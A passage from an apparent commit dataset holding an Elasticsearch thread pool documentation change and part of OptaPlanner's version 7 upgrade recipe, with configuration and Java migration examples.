icsearch,ivansun1010\/elasticsearch,xingguang2013\/elasticsearch,jpountz\/elasticsearch,xingguang2013\/elasticsearch,JervyShi\/elasticsearch,mmaracic\/elasticsearch,tahaemin\/elasticsearch,elasticdog\/elasticsearch,petabytedata\/elasticsearch,kevinkluge\/elasticsearch,cwurm\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,Fsero\/elasticsearch,vingupta3\/elasticsearch,cwurm\/elasticsearch,Kakakakakku\/elasticsearch,wittyameta\/elasticsearch,springning\/elasticsearch,bestwpw\/elasticsearch,Stacey-Gammon\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ThalaivaStars\/OrgRepo1,lmtwga\/elasticsearch,sreeramjayan\/elasticsearch,bawse\/elasticsearch,spiegela\/elasticsearch,sauravmondallive\/elasticsearch,bestwpw\/elasticsearch,djschny\/elasticsearch,caengcjd\/elasticsearch,jpountz\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kalburgimanjunath\/elasticsearch,ouyangkongtong\/elasticsearch,jeteve\/elasticsearch,strapdata\/elassandra,likaiwalkman\/elasticsearch,springning\/elasticsearch,JSCooke\/elasticsearch,smflorentino\/elasticsearch,jchampion\/elasticsearch,Collaborne\/elasticsearch,kenshin233\/elasticsearch,girirajsharma\/elasticsearch,lchennup\/elasticsearch,achow\/elasticsearch,springning\/elasticsearch,franklanganke\/elasticsearch,liweinan0423\/elasticsearch,jpountz\/elasticsearch,iantruslove\/elasticsearch,xpandan\/elasticsearch,mjason3\/elasticsearch,jeteve\/elasticsearch,fforbeck\/elasticsearch,polyfractal\/elasticsearch,jpountz\/elasticsearch,huanzhong\/elasticsearch,springning\/elasticsearch,ricardocerq\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kingaj\/elasticsearch,markharwood\/elasticsearch,artnowo\/elasticsearch,lzo\/elasticsearch-1,petabytedata\/elasticsearch,sdauletau\/elasticsearch,kunallimaye\/elasticsearch,zeroctu\/elasticsearch,truemped\/elasticsearch,humandb\/elasticsearch,achow\/elasticsearch,Collaborne\/elasticsearch,robin13\/elasticsearch,tebriel\/elasticsearch,uschindler\/elasticsearch,pranavraman\/elasticsearch,nellicus\/elasticsearch,vingupta3\/elasticsearch,brandonkearby\/elasticsearch,TonyChai24\/ESSource,infusionsoft\/elasticsearch,vietlq\/elasticsearch,robin13\/elasticsearch,queirozfcom\/elasticsearch,xpandan\/elasticsearch,diendt\/elasticsearch,btiernay\/elasticsearch,dongjoon-hyun\/elasticsearch,mikemccand\/elasticsearch,vroyer\/elasticassandra,MisterAndersen\/elasticsearch,wenpos\/elasticsearch,schonfeld\/elasticsearch,hydro2k\/elasticsearch,apepper\/elasticsearch,overcome\/elasticsearch,sneivandt\/elasticsearch,spiegela\/elasticsearch,EasonYi\/elasticsearch,truemped\/elasticsearch,khiraiwa\/elasticsearch,Shekharrajak\/elasticsearch,nazarewk\/elasticsearch,kenshin233\/elasticsearch,yuy168\/elasticsearch,wimvds\/elasticsearch,dylan8902\/elasticsearch,ricardocerq\/elasticsearch,girirajsharma\/elasticsearch,liweinan0423\/elasticsearch,szroland\/elasticsearch,jsgao0\/elasticsearch,franklanganke\/elasticsearch,luiseduardohdbackup\/elasticsearch,nrkkalyan\/elasticsearch,wimvds\/elasticsearch,huypx1292\/elasticsearch,Shekharrajak\/elasticsearch,adrianbk\/elasticsearch,hanswang\/elasticsearch,mrorii\/elasticsearch,NBSW\/elasticsearch,ImpressTV\/elasticsearch,HonzaKral\/elasticsearch,LeoYao\/elasticsearch,kalburgimanjunath\/elasticsearch,markharwood\/elasticsearch,kunallimaye\/elasticsearch,wuranbo\/elasticsearch,camilojd\/elasticsearch,TonyChai24\/ESSource,andrejserafim\/elasticsearch,pritishppai\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,maddin2016\/elasticsearch,NBSW\/elasticsearch,aglne\/elasticsearch,JSCooke\/elasticsearch,Coll
aborne\/elasticsearch,rajanm\/elasticsearch,camilojd\/elasticsearch,JervyShi\/elasticsearch,rmuir\/elasticsearch,yongminxia\/elasticsearch,LewayneNaidoo\/elasticsearch,kubum\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,weipinghe\/elasticsearch,gmarz\/elasticsearch,petabytedata\/elasticsearch,spiegela\/elasticsearch,schonfeld\/elasticsearch,obourgain\/elasticsearch,iacdingping\/elasticsearch,hanswang\/elasticsearch,iacdingping\/elasticsearch,socialrank\/elasticsearch,jimhooker2002\/elasticsearch,sdauletau\/elasticsearch,masterweb121\/elasticsearch,dylan8902\/elasticsearch,ricardocerq\/elasticsearch,vietlq\/elasticsearch,HonzaKral\/elasticsearch,AndreKR\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Shekharrajak\/elasticsearch,TonyChai24\/ESSource,mm0\/elasticsearch,mrorii\/elasticsearch,Chhunlong\/elasticsearch,fooljohnny\/elasticsearch,abibell\/elasticsearch,beiske\/elasticsearch,jango2015\/elasticsearch,glefloch\/elasticsearch,rlugojr\/elasticsearch,davidvgalbraith\/elasticsearch,i-am-Nathan\/elasticsearch,ImpressTV\/elasticsearch,iantruslove\/elasticsearch,karthikjaps\/elasticsearch,strapdata\/elassandra-test,sreeramjayan\/elasticsearch,lydonchandra\/elasticsearch,18098924759\/elasticsearch,MichaelLiZhou\/elasticsearch,coding0011\/elasticsearch,martinstuga\/elasticsearch,lchennup\/elasticsearch,rlugojr\/elasticsearch,hirdesh2008\/elasticsearch,LeoYao\/elasticsearch,ESamir\/elasticsearch,likaiwalkman\/elasticsearch,kenshin233\/elasticsearch,Collaborne\/elasticsearch,ThalaivaStars\/OrgRepo1,hanswang\/elasticsearch,vroyer\/elasticassandra,loconsolutions\/elasticsearch,YosuaMichael\/elasticsearch,episerver\/elasticsearch,nrkkalyan\/elasticsearch,sposam\/elasticsearch,MaineC\/elasticsearch,coding0011\/elasticsearch,andrejserafim\/elasticsearch,pritishppai\/elasticsearch,pranavraman\/elasticsearch,ESamir\/elasticsearch,nomoa\/elasticsearch,vietlq\/elasticsearch,kunallimaye\/elasticsearch,Widen\/elasticsearch,rmuir\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,jango2015\/elasticsearch,lightslife\/elasticsearch,obourgain\/elasticsearch,caengcjd\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,Brijeshrpatel9\/elasticsearch,mmaracic\/elasticsearch,loconsolutions\/elasticsearch,alexbrasetvik\/elasticsearch,elancom\/elasticsearch,i-am-Nathan\/elasticsearch,onegambler\/elasticsearch,bestwpw\/elasticsearch,MichaelLiZhou\/elasticsearch,markharwood\/elasticsearch,rajanm\/elasticsearch,koxa29\/elasticsearch,Rygbee\/elasticsearch,MisterAndersen\/elasticsearch,Ansh90\/elasticsearch,episerver\/elasticsearch,slavau\/elasticsearch,pablocastro\/elasticsearch,wittyameta\/elasticsearch,lks21c\/elasticsearch,springning\/elasticsearch,nilabhsagar\/elasticsearch,zhiqinghuang\/elasticsearch,himanshuag\/elasticsearch,Rygbee\/elasticsearch,socialrank\/elasticsearch,Fsero\/elasticsearch,sposam\/elasticsearch,kubum\/elasticsearch,dpursehouse\/elasticsearch,sneivandt\/elasticsearch,kalburgimanjunath\/elasticsearch,drewr\/elasticsearch,Charlesdong\/elasticsearch,episerver\/elasticsearch,kingaj\/elasticsearch,jimhooker2002\/elasticsearch,lchennup\/elasticsearch,wangtuo\/elasticsearch,MetSystem\/elasticsearch,mjason3\/elasticsearch,huanzhong\/elasticsearch,trangvh\/elasticsearch,qwerty4030\/elasticsearch,huypx1292\/elasticsearch,jimhooker2002\/elasticsearch,Shekharrajak\/elasticsearch,mnylen\/elasticsearch,achow\/elasticsearch,jimhooker2002\/elasticsearch,jsgao0\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,SergVro\/elasticsearch,jprante\/elastics
earch,martinstuga\/elasticsearch,LewayneNaidoo\/elasticsearch,yynil\/elasticsearch,masterweb121\/elasticsearch,mbrukman\/elasticsearch,sreeramjayan\/elasticsearch,winstonewert\/elasticsearch,polyfractal\/elasticsearch,mute\/elasticsearch,Chhunlong\/elasticsearch,tahaemin\/elasticsearch,lks21c\/elasticsearch,kimimj\/elasticsearch,achow\/elasticsearch,mrorii\/elasticsearch,yuy168\/elasticsearch,nellicus\/elasticsearch,fforbeck\/elasticsearch,sposam\/elasticsearch,umeshdangat\/elasticsearch,HarishAtGitHub\/elasticsearch,mcku\/elasticsearch,thecocce\/elasticsearch,YosuaMichael\/elasticsearch,markllama\/elasticsearch,lydonchandra\/elasticsearch,bawse\/elasticsearch,davidvgalbraith\/elasticsearch,trangvh\/elasticsearch","old_file":"docs\/reference\/modules\/threadpool.asciidoc","new_file":"docs\/reference\/modules\/threadpool.asciidoc","new_contents":"[[modules-threadpool]]\n== Thread Pool\n\nA node holds several thread pools to improve how thread memory consumption\nis managed within a node. Many of these pools also have queues associated with them,\nwhich allow pending requests to be held instead\nof discarded.\n\n\nThere are several thread pools, but the important ones include:\n\n`index`::\n    For index\/delete operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `200`.\n\n`search`::\n    For count\/search operations. Defaults to `fixed`\n    with a size of `3x # of available processors`,\n    queue_size of `1000`.\n\n`suggest`::\n    For suggest operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `1000`.\n\n`get`::\n    For get operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `1000`.\n\n`bulk`::\n    For bulk operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `50`.\n\n`percolate`::\n    For percolate operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `1000`.\n\n`snapshot`::\n    For snapshot\/restore operations. Defaults to `scaling` with a\n    keep-alive of `5m` and a size of `min(5, (# of available processors)\/2)`.\n\n`warmer`::\n    For segment warm-up operations. Defaults to `scaling` with a\n    keep-alive of `5m` and a size of `min(5, (# of available processors)\/2)`.\n\n`refresh`::\n    For refresh operations. Defaults to `scaling` with a\n    keep-alive of `5m` and a size of `min(10, (# of available processors)\/2)`.\n\n`listener`::\n    Mainly for the Java client to execute an action when its listener is threaded (set to `true`).\n    Default size of `(# of available processors)\/2`, capped at 10.\n\nChanging a specific thread pool can be done by setting its type and\nits type-specific parameters, for example, changing the `index` thread pool\nto have more threads:\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n    index:\n        type: fixed\n        size: 30\n--------------------------------------------------\n\nNOTE: You can update thread pool settings live using\n      <<cluster-update-settings>>.\n
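\nFor example, a transient cluster settings update along these lines could resize the `index` pool at runtime (a minimal sketch, assuming a node listening on `localhost:9200`; adapt the transport and the value to your setup):\n\n[source,js]\n--------------------------------------------------\ncurl -XPUT localhost:9200\/_cluster\/settings -d '{\n    \"transient\" : {\n        \"threadpool.index.size\" : 30\n    }\n}'\n--------------------------------------------------\n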
\n\n[float]\n[[types]]\n=== Thread pool types\n\nThe following are the types of thread pools that can be used and their\nrespective parameters:\n\n[float]\n==== `cache`\n\nThe `cache` thread pool is an unbounded thread pool that will spawn a\nthread if there are pending requests. Here is an example of how to set\nit:\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n    index:\n        type: cached\n--------------------------------------------------\n\n[float]\n==== `fixed`\n\nThe `fixed` thread pool holds a fixed number of threads to handle\nrequests, with a queue (optionally bounded) for pending requests that\nhave no threads to service them.\n\nThe `size` parameter controls the number of threads, and defaults to the\nnumber of cores times 5.\n\nThe `queue_size` parameter controls the size of the queue of pending\nrequests that have no threads to execute them. By default, it is set to\n`-1`, which means it is unbounded. When a request comes in and the queue is\nfull, the request is aborted.\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n    index:\n        type: fixed\n        size: 30\n        queue_size: 1000\n--------------------------------------------------\n\n[float]\n==== `scaling`\n\nThe `scaling` thread pool holds a dynamic number of threads. This number is\nproportional to the workload and varies between 1 and the value of the\n`size` parameter.\n\nThe `keep_alive` parameter determines how long a thread should be kept\naround in the thread pool without doing any work.\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n    warmer:\n        type: scaling\n        size: 8\n        keep_alive: 2m\n--------------------------------------------------\n\n[float]\n[[processors]]\n=== Processors setting\nThe number of processors is automatically detected, and the thread pool\nsettings are automatically set based on it. Sometimes the number of processors\nis detected incorrectly; in such cases, the number of processors can be\nset explicitly using the `processors` setting.\n
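\nFor instance, a minimal sketch of an `elasticsearch.yml` fragment that overrides the detected value (the value `4` is only illustrative):\n\n[source,js]\n--------------------------------------------------\nprocessors: 4\n--------------------------------------------------\n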
\nTo check the number of processors detected, use the nodes info\nAPI with the `os` flag.\n","old_contents":"[[modules-threadpool]]\n== Thread Pool\n\nA node holds several thread pools to improve how thread memory consumption\nis managed within a node. Many of these pools also have queues associated with them,\nwhich allow pending requests to be held instead\nof discarded.\n\n\nThere are several thread pools, but the important ones include:\n\n`index`::\n    For index\/delete operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `200`.\n\n`search`::\n    For count\/search operations. Defaults to `fixed`\n    with a size of `3x # of available processors`,\n    queue_size of `1000`.\n\n`suggest`::\n    For suggest operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `1000`.\n\n`get`::\n    For get operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `1000`.\n\n`bulk`::\n    For bulk operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `50`.\n\n`percolate`::\n    For percolate operations. Defaults to `fixed`\n    with a size of `# of available processors`,\n    queue_size of `1000`.\n\n`snapshot`::\n    For snapshot\/restore operations. Defaults to `scaling`,\n    keep-alive `5m` with a size of `(# of available processors)\/2`.\n\n`warmer`::\n    For segment warm-up operations. Defaults to `scaling`\n    with a `5m` keep-alive.\n\n`refresh`::\n    For refresh operations. Defaults to `scaling`\n    with a `5m` keep-alive.\n\n`listener`::\n    Mainly for the Java client to execute an action when its listener is threaded (set to `true`).\n    Default size of `(# of available processors)\/2`, capped at 10.\n\nChanging a specific thread pool can be done by setting its type and\nits type-specific parameters, for example, changing the `index` thread pool\nto have more threads:\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n    index:\n        type: fixed\n        size: 30\n--------------------------------------------------\n\nNOTE: You can update thread pool settings live using\n      <<cluster-update-settings>>.\n\n\n[float]\n[[types]]\n=== Thread pool types\n\nThe following are the types of thread pools that can be used and their\nrespective parameters:\n\n[float]\n==== `cache`\n\nThe `cache` thread pool is an unbounded thread pool that will spawn a\nthread if there are pending requests. Here is an example of how to set\nit:\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n    index:\n        type: cached\n--------------------------------------------------\n\n[float]\n==== `fixed`\n\nThe `fixed` thread pool holds a fixed number of threads to handle\nrequests, with a queue (optionally bounded) for pending requests that\nhave no threads to service them.\n\nThe `size` parameter controls the number of threads, and defaults to the\nnumber of cores times 5.\n\nThe `queue_size` parameter controls the size of the queue of pending\nrequests that have no threads to execute them. By default, it is set to\n`-1`, which means it is unbounded. When a request comes in and the queue is\nfull, the request is aborted.\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n    index:\n        type: fixed\n        size: 30\n        queue_size: 1000\n--------------------------------------------------\n\n[float]\n[[processors]]\n=== Processors setting\nThe number of processors is automatically detected, and the thread pool\nsettings are automatically set based on it. Sometimes the number of processors\nis detected incorrectly; in such cases, the number of processors can be\nset explicitly using the `processors` setting.\n\nTo check the number of processors detected, use the nodes info\nAPI with the `os` flag.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
 {"commit":"c6638be31be3a258d1b535fafcc26fbc88de7a56","subject":"PLANNER-1238 Didn't make 7.11.0.Final","message":"PLANNER-1238 Didn't make 7.11.0.Final\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe7.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe7.adoc","new_contents":"= Upgrade recipe 7\n:awestruct-description: Upgrade to OptaPlanner 7 from a previous version.\n:awestruct-layout: upgradeRecipeBase\n:awestruct-priority: 0.5\n:awestruct-upgrade_recipe_version: 7\n\n\n== From 6.5.0.Final to 7.0.0.Beta1\n\n=== Backwards incompatible changes to the public API in 7.0\n\nBecause this is a new major version number (7.0), which is the foundation for the 7.x series for the next few years,\nit allows us to make backwards incompatible changes to the public API _for the long term benefit of this project_.\n\nWe kept these backwards incompatible changes to a strict minimum\n(by favoring deprecation over removal) and will not introduce any additional ones during the 7.x era.\n\nAny backwards incompatible changes are annotated with a [.label.label-danger.label-as-badge.label-public-api]#Public API# badge.\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== Java 8 or higher required\n\nIf you're using JRE or JDK 6 or 7, upgrade to JDK 8 or higher.\n\nWe currently intend to support a minimal version of Java 8 throughout the entire 7.x series.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== Deprecated methods removed\n\nThe following long-term deprecated methods have finally been removed:\n\n* Setters on `ScoreHolder` implementations, such as `HardSoftScoreHolder.setHardScore(int)` and `setSoftScore(int)`.\nUse `addHardConstraintMatch(...)` and `addSoftConstraintMatch(...)` in your score rules instead.\nSee link:.\/upgradeRecipe6.0.html[this upgrade recipe].\n\n* The experimental, deprecated, hybrid metaheuristic called `LATE_SIMULATED_ANNEALING`\n(which was inspired by both Late Acceptance and Simulated Annealing) has been removed.\n\n* The dead, deprecated code of `DeciderScoreComparatorFactory` has been removed.\nSee link:.\/upgradeRecipe6.2.html[this upgrade recipe].\n\n* The deprecated `SolverBenchmarkBluePrintType.ALL_CONSTRUCTION_HEURISTIC_TYPES` has been removed.\nSee link:.\/upgradeRecipe6.3.html[this upgrade recipe].\n\n\n[.upgrade-recipe-major]\n=== `Solution` interface removed (deprecated)\n\nYour solution class no longer needs to have both the `@PlanningSolution` annotation and implement the `Solution` interface;\nthe annotation alone suffices. 
The `Solution` interface has been deprecated and will be removed in a future version.\n\nRemove the `Solution` interface, annotate the `getScore()` method with `@PlanningScore`\nand replace the `getProblemFacts()` method with a `@ProblemFactCollectionProperty` annotation directly on every problem fact getter (or field).\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance implements Solution<HardSoftScore> {\n\n private List<CloudComputer> computerList;\n ...\n\n private HardSoftScore score;\n\n @ValueRangeProvider(id = \"computerRange\")\n public List<CloudComputer> getComputerList() {...}\n\n public HardSoftScore getScore() {...}\n public void setScore(HardSoftScore score) {...}\n\n public Collection<? extends Object> getProblemFacts() {\n List<Object> facts = new ArrayList<Object>();\n facts.addAll(computerList);\n ...\n return facts;\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n private List<CloudComputer> computerList;\n ...\n\n private HardSoftScore score;\n\n @ValueRangeProvider(id = \"computerRange\")\n @ProblemFactCollectionProperty\n public List<CloudComputer> getComputerList() {...}\n\n @PlanningScore\n public HardSoftScore getScore() {...}\n public void setScore(HardSoftScore score) {...}\n\n}\n----\n\nFor a single problem fact (which is not wrapped in a `Collection`), use the `@ProblemFactProperty` annotation,\nas shown below (with field annotations this time).\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance implements Solution<HardSoftScore> {\n\n private CloudParametrization parametrization;\n private List<CloudBuilding> buildingList;\n @ValueRangeProvider(id = \"computerRange\")\n private List<CloudComputer> computerList;\n ...\n\n public Collection<? 
extends Object> getProblemFacts() {\n List<Object> facts = new ArrayList<Object>();\n facts.add(parametrization); \/\/ not a Collection\n facts.addAll(buildingList);\n facts.addAll(computerList);\n ...\n return facts;\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n @ProblemFactProperty\n private CloudParametrization parametrization;\n @ProblemFactCollectionProperty\n private List<CloudBuilding> buildingList;\n @ValueRangeProvider(id = \"computerRange\")\n @ProblemFactCollectionProperty\n private List<CloudComputer> computerList;\n ...\n\n}\n----\n\nDon't add the `@ProblemFactCollectionProperty` annotation on getters (or fields)\nthat have a `@PlanningEntityCollectionProperty` annotation.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `Solver`: return values no longer implement `Solution`\n\nBecause the `Solution` interface was deprecated (see the section below to upgrade from 6.4.0.Final to 7.0.0.Beta1),\nthe `Solver.solve(...)` and `Solver.getBestSolution()` methods now return an `Object` instead of a `Solution` instance\n(if and only if no type parameter is specified for the `Solver`).\n\n*This only applies if you're still using a `Solver` without a type parameter\nand if you're not casting the return value immediately to your solution implementation (which is unlikely).*\n\nBefore in `*.java`:\n[source, java]\n----\nSolution s = solver.solve(problem);\nCloudBalance solution = (CloudBalance) s;\n----\n\nAfter in `*.java` (quick and dirty fix):\n[source, java]\n----\nCloudBalance solution = (CloudBalance) solver.solve(problem);\n----\n\nAfter in `*.java` (recommended fix):\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\n...\nCloudBalance solution = solver.solve(problem);\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `BestSolutionChangedEvent.getNewBestSolution()`: return value no longer implements `Solution`\n\nBecause the `Solution` interface was deprecated (see the section below to upgrade from 6.4.0.Final to 7.0.0.Beta1),\nthe `BestSolutionChangedEvent.getNewBestSolution()` method now returns an `Object`\n(if and only if no type parameter is specified for the `SolverEventListener`).\n\n*This only applies if you're still using a `SolverEventListener` without a type parameter\nand if you're not casting the return value immediately to your solution implementation (which is unlikely).*\n\nBefore in `*.java`:\n[source, java]\n----\nSolverFactory factory = SolverFactory.createFromXmlResource(...);\nSolver solver = factory.buildSolver();\nsolver.addEventListener(new SolverEventListener() {\n @Override\n public void bestSolutionChanged(BestSolutionChangedEvent event) {\n Solution s = event.getNewBestSolution();\n CloudBalance solution = (CloudBalance) s;\n ...\n }\n});\n----\n\nAfter in `*.java`:\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\nsolver.addEventListener(new SolverEventListener<CloudBalance>() {\n @Override\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n CloudBalance solution = event.getNewBestSolution();\n ...\n }\n});\n----\n\nAnd you'll probably want to use a lambda here:\n\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = 
factory.buildSolver();\nsolver.addEventListener(event -> {\n CloudBalance solution = event.getNewBestSolution();\n ...\n});\n----\n\n\n[.upgrade-recipe-major]\n=== `SolutionFileIO`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`SolutionFileIO` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class TspFileIO implements SolutionFileIO {\n ...\n\n public Solution read(File inputSolutionFile) {...}\n\n public void write(Solution solution, File outputSolutionFile) {\n TspSolution tspSolution = (TspSolution) solution;\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class TspFileIO implements SolutionFileIO<TspSolution> {\n ...\n\n public TspSolution read(File inputSolutionFile) {...}\n\n public void write(TspSolution tspSolution, File outputSolutionFile) {\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `XStreamSolutionFileIO`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`XStreamSolutionFileIO` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\nSolutionFileIO solutionFileIO = new XStreamSolutionFileIO(CloudBalance.class);\n----\n\nAfter in `*.java`:\n[source, java]\n----\nSolutionFileIO<CloudBalance> solutionFileIO = new XStreamSolutionFileIO<>(CloudBalance.class);\n----\n\n\n[.upgrade-recipe-minor]\n=== `SelectionFilter`: added generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation,\na `SelectionFilter` now also has a generic type parameter for the solution, not just the selection type.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class LectureFilter implements SelectionFilter<Lecture> {\n\n public boolean accept(ScoreDirector scoreDirector, Lecture lecture) {\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class LectureFilter implements SelectionFilter<CourseSchedule, Lecture> {\n\n @Override\n public boolean accept(ScoreDirector<CourseSchedule> scoreDirector, Lecture lecture) {\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `CustomPhaseCommand`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`CustomPhaseCommand` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand {\n\n public void changeWorkingSolution(ScoreDirector scoreDirector) {\n DinnerParty dinnerParty = (DinnerParty) scoreDirector.getWorkingSolution();\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n\n public void changeWorkingSolution(ScoreDirector<DinnerParty> scoreDirector) {\n DinnerParty dinnerParty = scoreDirector.getWorkingSolution();\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-major]\n=== `ProblemFactChange`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`ProblemFactChange` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\n 
solver.addProblemFactChange(new ProblemFactChange() {\n        public void doChange(ScoreDirector scoreDirector) {\n            CloudBalance cloudBalance = (CloudBalance) scoreDirector.getWorkingSolution();\n            ...\n        }\n    });\n----\n\nAfter in `*.java`:\n[source, java]\n----\n    solver.addProblemFactChange(new ProblemFactChange<CloudBalance>() {\n        public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n            CloudBalance cloudBalance = scoreDirector.getWorkingSolution();\n            ...\n        }\n    });\n----\n\nAfter in `*.java` (with lambda):\n[source, java]\n----\n    solver.addProblemFactChange(scoreDirector -> {\n        CloudBalance cloudBalance = scoreDirector.getWorkingSolution();\n        ...\n    });\n----\n\n\n[.upgrade-recipe-minor]\n=== `Bendable*Score`: `toString()` changed\n\nThe `String` form of a bendable score (`BendableScore`, `BendableLongScore` or `BendableBigDecimalScore`)\nhas changed so it can be parsed without the `ScoreDefinition`.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n    <termination>\n      <bestScoreLimit>0\/0\/-1\/-2\/-3<\/bestScoreLimit>\n    <\/termination>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n    <termination>\n      <bestScoreLimit>[0\/0]hard\/[-1\/-2\/-3]soft<\/bestScoreLimit>\n    <\/termination>\n----\n\nBefore in XStream `*.xml` output with `optaplanner-persistence-xstream`:\n[source, xml]\n----\n  <score>0\/0\/-1\/-2\/-3<\/score>\n----\n\nAfter in XStream `*.xml` output with `optaplanner-persistence-xstream`:\n[source, xml]\n----\n  <score>[0\/0]hard\/[-1\/-2\/-3]soft<\/score>\n----\n\n\n[.upgrade-recipe-major]\n=== `EnvironmentMode`: `PRODUCTION` renamed\n\nThe `EnvironmentMode` `PRODUCTION` has been renamed to `NON_REPRODUCIBLE`\nbecause most enterprises use `REPRODUCIBLE` in production and that's fine.\nFor backwards compatibility, `PRODUCTION` still exists, but it's deprecated and it will be removed in a future version.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<solver>\n  <environmentMode>PRODUCTION<\/environmentMode>\n  ...\n<\/solver>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<solver>\n  <environmentMode>NON_REPRODUCIBLE<\/environmentMode>\n  ...\n<\/solver>\n----\n\n\n[.upgrade-recipe-readme]\n=== Average calculate count renamed to score calculation speed\n\nIn the logs and the benchmark report, the _average calculate count per second_ has been renamed to _score calculation speed_.\n\n\n[.upgrade-recipe-minor]\n=== `Termination`: `calculateCountLimit` renamed\n\nThe termination configuration property `calculateCountLimit` has been renamed to `scoreCalculationCountLimit`.\nThe property `calculateCountLimit` has been deprecated and will be removed in a future version.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n  <termination>\n    <calculateCountLimit>100000<\/calculateCountLimit>\n  <\/termination>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n  <termination>\n    <scoreCalculationCountLimit>100000<\/scoreCalculationCountLimit>\n  <\/termination>\n----\n\n\n[.upgrade-recipe-minor]\n=== `ProblemStatisticType`: `CALCULATE_COUNT_PER_SECOND` renamed\n\nThe benchmark ProblemStatisticType `CALCULATE_COUNT_PER_SECOND` has been renamed to `SCORE_CALCULATION_SPEED`.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n    <problemStatisticType>CALCULATE_COUNT_PER_SECOND<\/problemStatisticType>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n    
